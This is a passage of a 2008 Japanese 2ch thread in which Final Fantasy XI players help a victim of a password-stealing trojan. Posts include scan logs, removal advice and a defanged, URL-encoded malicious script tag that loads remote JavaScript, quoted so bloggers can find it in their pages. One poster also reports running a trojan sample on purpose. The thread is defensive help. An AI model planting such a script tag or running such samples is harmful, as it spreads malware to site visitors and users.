945 ：既にその名前は使われています：2008/03/24(月) 01:16:57.02 ID:2S7MefoA: マジでこの悪夢が終わることを願う。
とりあえず寝る前にあげとく。
946 ：既にその名前は使われています：2008/03/24(月) 01:17:01.25 ID:7DTVIQ6X: まず公式で大々的に、ついでにゲーム中でも注意喚起くらいしろよ
認証方式の変更や被害者への補償もいい加減したっていいんじゃないか
かわいそすぎて見てられないわ
947 ：既にその名前は使われています：2008/03/24(月) 01:19:37.56 ID:aCIWlJ1+: >>946
ほんとになぁ・・・・・
課金再開したときくらいしか送ってこないpolメールとか活用しろよな・・・・
948 ：既にその名前は使われています：2008/03/24(月) 01:19:41.50 ID:ZfckpKA+: >>942
メールは規制できるので問題ありません…たぶんですけど。
心配してくださってありがとうございます<(_ _)>

>>944
参考にします！

一箇所だけですが結果が出ました。

ターゲットの選択: 重要な領域
ソース:
E:\WINDOWS;
E:\DOCUME~1\ユーザー名\LOCALS~1\Temp\;

゛Trojan-PSW.Win32.OnLineGames.lbb"
↑これが危ないみたいです
949 ：既にその名前は使われています：2008/03/24(月) 01:25:49.10 ID:ddVbsWZc: 今知ったfc2ブロガーなんですが、自分のブログが感染してるかどうかは
どうやって診断すりゃいいんでしょうか。
とりあえずソースをiframeで検索しただけだと怪しいのは無いんですが。
950 ：既にその名前は使われています：2008/03/24(月) 01:29:32.48 ID:hdKDzAOI: フレにGMを代わりに呼んでもらって、事情を話してもらうとかはどぉ？
リアルメルアドとか知ってないとアレだが…
白門でフリーズしまくったときにはフレにメールしてGM呼んで対応してもらった。
問題はハックされたキャラへGMからtell来た後の対応がどうなるか…
複数のフレに連絡してもらった方がいいのかねぇ？
951 ：既にその名前は使われています：2008/03/24(月) 01:30:51.62 ID:Q/ktx4QO: >>944
>PC用FF用にマシンを分ける
可能であれば、次のような構成にする。(等幅フォント推奨)

モデム－ルータ１－ルータ２－ FFXI用PC
　　　　　　　　　|- ルータ３－スイッチングハブ－その他いろいろ

ルータ１でグローバルとローカルのセグメントをまず分ける。
　192.168.1.1-255 subnet 255.255.0.0
ルータ２で１つめのローカルセグメントに分ける。
　192.168.2.1-255 subnet 255.255.0.0
ルータ３で２つめのローカルセグメントに分ける。
　192.168.3.1-255 subnet 255.255.0.0
これで、ルータ２とルータ３のネットワークは論理的にも物理的にも隔離できる。
952 ：既にその名前は使われています：2008/03/24(月) 01:31:38.82 ID:DyD4MS3I: >>948
ウイルス対策ソフトは持ってないのか？
無いならKasperskyの体験版がオススメだな
ダウンロードはココから
http://ime.nu/www.just-kaspersky.jp/products/try/

>>949
iframeだけじゃなくscriptも検索
953 ：既にその名前は使われています：2008/03/24(月) 01:32:17.70 ID:RFGY8cIB: >>950
先週の件を見ていた限りだと第三者からのコールじゃ動いてもらえない感じ
954 ：既にその名前は使われています：2008/03/24(月) 01:33:06.49 ID:rpE40Jdl: そのままカスペのトライアル版インスコして駆除したらどうでしょう
使ってるＰＣにアンチウィルスソフトあるなら、それで削除できたらいいかもですが・・・
バハスレでアカウント使わせてくれるって言ってる方の、借りたほうがいいですよ
後でやりとりして納得する返し方すればいいんですし。でないと上で書かれてる方がいるように
鯖移動とか業者の手伝いキャラにされてるとか・・・被害増えそうですし
955 ：既にその名前は使われています：2008/03/24(月) 01:33:50.24 ID:cxfdIhE2: >>950
垢ハックではフレは役に立てないよ
GMは本人の申し出からのみキャラの保護をするというのが先週末の騒動のときの流れ

GMからすれば第三者から言われても嫌がらせと区別できないというのもある
956 ：既にその名前は使われています：2008/03/24(月) 01:35:10.09 ID:ZfckpKA+: >>950
メール交換しているフレ等にはメールしましたが、みんな寝てる人でorz
明日には手遅れかもしれませんが、待つしかなさそうな感じです。

>>952
ありがとうございます<(_ _)>オンラインスキャンが終わったら導入してみます。

途中結果ですが
・ターゲットの選択: メモリ
ソース: 実行中の全てのプロセス

コレが引っかかりました↓
"Trojan-Downloader.Win32.Delf.dsz"

スキャンしたファイル: 1826
見つかったウイルス: 3
感染したオブジェクト: 27
疑わしいオブジェクト: 0
スキャンプロセスの所要時間: 00:00:50
957 ：既にその名前は使われています：2008/03/24(月) 01:35:51.99 ID:RFGY8cIB: 他人のキャラ借りてのコールはOKだっけ
厳密には規約違反です、と注意されたという書き込みはみたんだが
それでOKだったのかはちょっと覚えていないな
958 ：既にその名前は使われています：2008/03/24(月) 01:37:42.98 ID:47bjLYLG: >>949
あとはJavaScriptもですね。
例を出すと

<script language="javascript" src="hxxp://%77%77%77%2E%66%
63%63%6A%61%2E%63%6F%6D/%65%2E%6A%73"></script>

hxxpはhttpで頭の中で変換してください。

こういったJAVAスクリプトが張られていないか探してみてください。
959 ：既にその名前は使われています：2008/03/24(月) 01:38:50.27 ID:We8pVkNe: >>956
これか？
960 ：既にその名前は使われています：2008/03/24(月) 01:39:14.07 ID:aCIWlJ1+: >>951
サンクス

けっこうややこしそうだな・・・・、セグメントとかまったく初耳／(^o^)＼
ルーターの設定とかわからんぜ、とりあえずネットはルーター通してつないでるが・・・・・
わかりやすく解説してるサイトとかないものか＼(^o^)／
961 ：既にその名前は使われています：2008/03/24(月) 01:39:21.79 ID:DyD4MS3I: レジコもらって新規アカウントでGMコールした人は
倉庫キャラの名前全部と倉庫キャラがいつもいる場所とかの質問で本人確認されてから
垢停止してもらえてたかな
962 ：既にその名前は使われています：2008/03/24(月) 01:41:45.99 ID:kK/PADZl: 例え同居の家族親族で、本人の事情やキャラ事情の確認内容を正しく伝えられたとしても
本人でない限りサポセンでは対応してくれないよ
特にアカウントに関する事はね。
初期の頃は甘かったけどここ数年はNO

性別が同じで最初から本人に成りすましての問い合わせでもない限り
本人から委任された代理だと口頭で伝えようが無理だよ。
963 ：既にその名前は使われています：2008/03/24(月) 01:42:30.95 ID:0jHdHBFL: 厨蚊ＩＰ蹴るようにルータの設定した方が早いな
964 ：既にその名前は使われています：2008/03/24(月) 01:52:43.60 ID:Q/ktx4QO: >>946
ただなぁ...
実際の被害者は、ユーザではなく、サービスに不正ログインされた□eなんだよね。
ID/pwの管理はユーザ任せだから、□eに責はないんだ。

といっても、ノートでどこでもできるから、IP+ID/pw認証もユーザの申告制になるし
どこまで認証を厳しくするか、微妙

>>948
ttp://www.viruslist.com/en/viruses/encyclopedia?virusid=250983
まだ検体がなくて解析されてないらしいので、PCに詳しい友人または自分で
検体(感染してるファイル)を各ウィルスソフト屋に提出しよう。

>>949
過去ログ見ろ。
965 ：既にその名前は使われています：2008/03/24(月) 01:56:21.26 ID:Q/ktx4QO: >>956
ttp://www.viruslist.com/en/viruses/encyclopedia?virusid=269574
>Downloader.Win32.Delf.dsz
>>959のワームをダウンロードさせたワームだね
966 ：既にその名前は使われています：2008/03/24(月) 02:02:20.63 ID:Q/ktx4QO: >>959
違う。
>>956のはワームのダウンローダで、
>>948がID/pw保存ファイルを抜いてる。
ID/pw保存ファイルを送信するやつがもう１つあるはず。
967 ：既にその名前は使われています：2008/03/24(月) 02:05:29.69 ID:Q/ktx4QO: >>960
「はじめてのネットワーク」みたいな本を見てみてくれ。
先の以上に詳しく説明すると、スレ丸ごといるｗ

PCのコンパネからネットワーク開いて、
グローバルアドレス(プロバイダからもらったIPに似たような数値)に
なってないことだけ確認しておけ。
968 ：既にその名前は使われています：2008/03/24(月) 02:09:40.45 ID:ZfckpKA+: 今、ターゲットの選択: マイコンピュータ
ソース: A:\; C:\; D:\; E:\; F:\; G:\;

をオンラインスキャンしてますがまだまだ時間がかかりそうです。

>>964->>966
もう一つですか…結果が出たら報告します<(_ _)>

今の場所が終わるまで２時間近くかかりそうなので…orz
969 ：既にその名前は使われています：2008/03/24(月) 02:11:34.67 ID:Vn0/fEwr: 今までバスター使ってたけど、ここを見て不安になったのでカスペルスキーの３０日体験版を導入。
いま完全スキャン中なんだけど、終わる予定が５時ってｗ
バスターさんのスキャンは１時間足らずだったんだけど、これがカスペルの普通なんでしょうか？
970 ：既にその名前は使われています：2008/03/24(月) 02:13:47.30 ID:DyD4MS3I: カスペは初回のスキャンが遅いけど次回から(爆)速
971 ：既にその名前は使われています：2008/03/24(月) 02:13:59.85 ID:QdOH9ZPy: Trojan-Downloader.Win32.Agent.kgv
Trojan-Downloader.Win32.Agent.kht

これがウイルスですか？
972 ：既にその名前は使われています：2008/03/24(月) 02:15:56.97 ID:Q/ktx4QO: >>971
>>966
973 ：既にその名前は使われています：2008/03/24(月) 02:21:16.81 ID:DyD4MS3I: FlashGet（久々に見たなコレ）も脆弱性つかれてトロイ感染源になっとったのかよ
974 ：既にその名前は使われています：2008/03/24(月) 02:27:04.14 ID:Q/ktx4QO: ID : ZfckpKA+
次回から、感染してたファイル名もあるとうれしい。
ウィルス対策ソフト会社によって名前違うんだわ。

日本語版でかなり近いものの解説を見つけたのではっとく
　ttp://www.mcafee.com/japan/security/virPQ2007.asp?v=PWS-Mmorpg.gen
たぶん、こいつの亜種で、FFXIターゲットなんだと思う。
ゆえに、だれも検体を出してないから、詳細の解析がなされてないと思われる。
975 ：既にその名前は使われています：2008/03/24(月) 02:38:26.70 ID:8uqZSA/X: 今夜ハックされてた人はブログ閲覧から感染したのかな？
976 ：既にその名前は使われています：2008/03/24(月) 02:44:56.58 ID:0jHdHBFL: とりあえず、ハックされてない奴もされた奴も
パッチは全部当てとけよ
あと、有名所のアンチウイルスソフトのＨＰでは
無料のオンラインスキャンを用意しているから
金の無い奴は活用すると良い
977 ：既にその名前は使われています：2008/03/24(月) 02:46:05.24 ID:ZfckpKA+: >>974
レポートからのコピーですが貼っておきますね。

・重要な領域
E:\WINDOWS\Help\3EC849F38E63.dll 感染: Trojan-PSW.Win32.OnLineGames.lbb
E:\WINDOWS\Help\3EC849F38E63.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb
E:\WINDOWS\system32\1.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb
E:\WINDOWS\system32\2.exe 感染: Trojan-PSW.Win32.OnLineGames.fcj
E:\WINDOWS\system32\explorerf.exe 感染: Trojan-PSW.Win32.OnLineGames.fcj
E:\WINDOWS\system32\krnp32drv.dll 感染: Trojan-PSW.Win32.OnLineGames.pnr
E:\WINDOWS\system32\systemlf.dll 感染: Trojan-PSW.Win32.OnLineGames.fcj

・メモリ領域
ウイルス名前回の処理
[0] [System Process] => E:\WINDOWS\hELP\3EC849F38E63.dll 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
[0] [System Process] => E:\WINDOWS\system32\systemlf.dll 感染: Trojan-PSW.Win32.OnLineGames.fcj スキップ
[0] [System Process] => E:\Program Files\Common Files\Microsoft Shared\MSINFO\SysInfo.wmp 感染: Trojan-Downloader.Win32.Delf.dsz スキップ
つづきます
978 ：既にその名前は使われています：2008/03/24(月) 02:46:44.69 ID:ZfckpKA+: [1468] explorer.exe => E:\Program Files\Common Files\Microsoft Shared\MSINFO\SysInfo.wmp 感染: Trojan-Downloader.Win32.Delf.dsz スキップ
[1468] explorer.exe => E:\WINDOWS\hELP\3EC849F38E63.dll 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
[1468] explorer.exe => E:\WINDOWS\system32\systemlf.dll 感染: Trojan-PSW.Win32.OnLineGames.fcj スキップ
[1560] mixer.exe => E:\WINDOWS\hELP\3EC849F38E63.dll 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
[1608] apdproxy.exe => E:\WINDOWS\hELP\3EC849F38E63.dll 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
[1616] aMPStation.exe => E:\WINDOWS\hELP\3EC849F38E63.dll 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
[1624] PDVDServ.exe => E:\WINDOWS\hELP\3EC849F38E63.dll 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
[1632] qttask.exe => E:\WINDOWS\hELP\3EC849F38E63.dll 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
[1672] IPv6RExUI.exe => E:\WINDOWS\hELP\3EC849F38E63.dll 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
[1680] rundll32.exe => E:\WINDOWS\hELP\3EC849F38E63.dll 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
[1688] explorerf.exe => E:\WINDOWS\system32\explorerf.exe 感染: Trojan-PSW.Win32.OnLineGames.fcj スキップ
[1688] explorerf.exe => E:\WINDOWS\system32\systemlf.dll 感染: Trojan-PSW.Win32.OnLineGames.fcj スキップ
[1696] ctfmon.exe => E:\WINDOWS\hELP\3EC849F38E63.dll 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
[1740] TabUserW.exe => E:\WINDOWS\hELP\3EC849F38E63.dll 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
979 ：既にその名前は使われています：2008/03/24(月) 02:47:12.83 ID:EkJgurYg: 早めに次スレを
980 ：既にその名前は使われています：2008/03/24(月) 02:47:25.24 ID:ZfckpKA+: [3340] rundll32.exe => E:\WINDOWS\hELP\3EC849F38E63.dll 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
[2468] Jane2ch.exe => E:\WINDOWS\hELP\3EC849F38E63.dll 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
[2468] Jane2ch.exe => E:\WINDOWS\system32\systemlf.dll 感染: Trojan-PSW.Win32.OnLineGames.fcj スキップ
[2468] Jane2ch.exe => E:\Program Files\Common Files\Microsoft Shared\MSINFO\SysInfo.wmp 感染: Trojan-Downloader.Win32.Delf.dsz スキップ
[2708] iexplore.exe => E:\WINDOWS\hELP\3EC849F38E63.dll 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
[2708] iexplore.exe => E:\WINDOWS\system32\systemlf.dll 感染: Trojan-PSW.Win32.OnLineGames.fcj スキップ
[2708] iexplore.exe => E:\Program Files\Common Files\Microsoft Shared\MSINFO\SysInfo.wmp 感染: Trojan-Downloader.Win32.Delf.dsz スキップ
[2232] WLLoginProxy.exe => E:\WINDOWS\hELP\3EC849F38E63.dll 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
[4060] notepad.exe => E:\WINDOWS\hELP\3EC849F38E63.dll 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
[4060] notepad.exe => E:\WINDOWS\system32\systemlf.dll 感染: Trojan-PSW.Win32.OnLineGames.fcj

今のところはこんな感じです<(_ _)>少しでも解決の手がかりになれば、です。
981 ：既にその名前は使われています：2008/03/24(月) 02:47:25.80 ID:7DTVIQ6X: >>975
ほぼそうだと思う
被害者は相当数いるんじゃないか？
抜いたパスを処理し切れてない様子だから来週もまた増えるだろうな
982 ：既にその名前は使われています：2008/03/24(月) 02:48:36.05 ID:7DTVIQ6X: スレたてチャレンジしてみるわ
983 ：既にその名前は使われています：2008/03/24(月) 02:52:31.34 ID:vQXYTLxz: 今現在パス抜きされてないから安全と考えるのは早計。
業者の順次処理待ちに並んでるだけかもしれない。
984 ：既にその名前は使われています：2008/03/24(月) 02:55:27.08 ID:7DTVIQ6X: たてといた
http://live27.2ch.net/test/read.cgi/ogame/1206294621/

テンプレやっぱちょっと長すぎる感があるな
985 ：既にその名前は使われています：2008/03/24(月) 03:00:11.05 ID:Q/ktx4QO: >>977
PSW.Win32.OnLineGamesがずらっといるところを見ると、
各種MMO対応型臭いな。
つか、こんだけ常駐してると、メモリもCPUも食うから重くならなかった？

どうすっかな。
検体の代理提出してもいいが、あぷろだ経由ってわけにもいかぬな。
かといって、メアドもお互い不幸になるしなｗ
ひとまず、これ見て提出準備できるか考えてみて。
　ttp://www.mcafee.com/japan/security/contactavert.asp
986 ：既にその名前は使われています：2008/03/24(月) 03:01:23.01 ID:ZfckpKA+: ターゲットの選択: マイコンピュータ
ソース: A:\; C:\; D:\; E:\; F:\; G:\;

スキャンの実行 [54%]:

スキャンしたファイル: 123974
見つかったウイルス: 7
感染したオブジェクト: 28
疑わしいオブジェクト: 7

今のところこのぐらいです。かなりありますorz
あと１時間半ぐらいなので、少し寝ます。
またあとで報告しに来ます<(_ _)>

たくさん励ましたもらってありがとうございます！
とにかく解決までがんばります<(_ _)>
987 ：既にその名前は使われています：2008/03/24(月) 03:02:50.09 ID:ZfckpKA+: >>985
あ、かなり重かったです。パソコンが古いからそれが原因かなと思ってました。
参考のアドレス、見ておきますね。
988 ：既にその名前は使われています：2008/03/24(月) 03:03:21.56 ID:Q/ktx4QO: >>984
Wiki化するか、有志でどこぞの無料HP取って作るかだなや
989 ：既にその名前は使われています：2008/03/24(月) 03:09:45.52 ID:IxSaroBR: ID:ZfckpKA+にちょっと聞きたい。
P2Pやってるとかってオチないよね？
ちょっと腑に落ちない点があったので
990 ：既にその名前は使われています：2008/03/24(月) 03:12:48.64 ID:0jHdHBFL: 最近のウィルスは複数の脆弱制に対応してたりするからな
一つでも穴があれば感染しまくっても不思議じゃない
991 ：既にその名前は使われています：2008/03/24(月) 03:16:14.93 ID:Q/ktx4QO: >>987
寝て落ち着いてからにしなされ。
まずは、サポセンに電話して、アカウントを丸ごと止めさせるんだ。

次に、スキャンが終わってたら、PCをネットからケーブルごと引っこ抜け。
感染している以上、外部から完全に掌握されていると思ってくれ。

それから、ブラウザの履歴見て、PCの動作ががつんと重くなったと
感じたあたりを思い出してみて。
ポイント的には、なんちゃら.jp以外のところ。

そして、ワームの検体の提出を考えるのは最後にすること。
なぜなら、既に検出できてるわけだから。
992 ：既にその名前は使われています：2008/03/24(月) 03:17:48.67 ID:BS8RD3fS: 次ｽﾚ乙
うめるか
993 ：既にその名前は使われています：2008/03/24(月) 03:19:11.91 ID:Q/ktx4QO: >>989
原因探求は、まずアカウント止めさせる手続きをしてもらってから考えてもらおうや。
P2Pも含めて、自分が動かしてたと認識してるソフトを列挙してもらわないとならん。
994 ：既にその名前は使われています：2008/03/24(月) 03:21:25.80 ID:ddVbsWZc: >>952 >>958
ありがとうございます。
今のところ大丈夫っぽいみたいでした
995 ：既にその名前は使われています：2008/03/24(月) 03:21:41.39 ID:Q/ktx4QO: 埋めるな。埋めたらこの情報が全部落ちるんだぞ
996 ：既にその名前は使われています：2008/03/24(月) 03:22:36.04 ID:+9ScgTsR: 1000
997 ：既にその名前は使われています：2008/03/24(月) 03:34:48.58 ID:8jcNID1A: >>57 >>63のxia.exeがTrojan-Downloader.Win32.Delf.dszなんで
落として実行してみた
カスペのオンラインスキャンを掛けようとするとIEを落とされるので
試用版をインストールしてスキャン中
当たりっぽい
998 ：既にその名前は使われています：2008/03/24(月) 03:37:54.55 ID:Q/ktx4QO: >>997
単品なら、ここでチェックさせられる。
　ttp://www.kaspersky.co.jp/scanforvirus
999 ：既にその名前は使われています：2008/03/24(月) 03:40:38.66 ID:fJ5F8Y4D: 埋めついでに。

Sleipnirを長く使ってきたが、これを機にSafariを試してみた。
インストールが終わって、起動・・・することもなく異常終了した。

1000
1000 ：既にその名前は使われています：2008/03/24(月) 03:42:31.26 ID:IxSaroBR: 1000なら